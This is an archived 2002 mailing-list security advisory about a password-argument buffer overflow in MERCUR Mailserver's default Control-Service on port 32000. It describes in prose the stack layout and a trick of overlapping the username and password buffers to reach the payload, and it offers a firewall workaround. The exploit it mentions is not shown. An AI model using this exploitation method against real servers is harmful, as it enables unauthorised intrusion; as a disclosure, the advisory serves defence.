2c79cbe14ac7d0b8472d3f129fa1df55 Security Adisory #3 #PRODUCT Atrium Software International's MERCUR Mailserver, All Versions #DESCRIPTION MERCUR Mailserver's Control-Service, installed and activated by default on port 32000, is vulnerable to the classic buffer overflow on it's password argument.. an exploit for MERCUR 4.2 (current) is included and it has been tested against both win2k and winxp pro.. <260 bytes><EBP><EIP> as you can see, I'm too lazy to write my own shellcode to fit in that wee little 260 byte buffer.. and we can't choose the right side as anything over a few bytes will end up overwriting what will become the contents of ECX prior to our target RET, causing an early exception.. so a sexy little trick is in order.. we just abuse the fact that an invalid username, one of a very large length, is copied and stays resident in local memory when we overrun the password buffer.. sizing these two buffers correctly, and we can have them overlap each other, allowing us to jump from the password buffer to our payload (username buffer) easily.. YIPPPEE!@!# #FIX/PATCH/WORKAROUND no patch this time, as a workaround is simple.. MERCUR allows you to restrict access to each service individually under the Security -> Firewall options.. 32000 should be restricted on default, and I would guess it soon may be.. sorry about the winamp patch, who the hell knew winrar uses a proprietary zip format.. symantec's #1 fan, 2c79cbe14ac7d0b8472d3f129fa1df55 __________________________________________________ Do You Yahoo!? Yahoo! Autos - Get free new car price quotes http://autos.yahoo.com
This archive was generated by hypermail 2b30 : Thu Jul 18 2002 - 08:18:43 PDT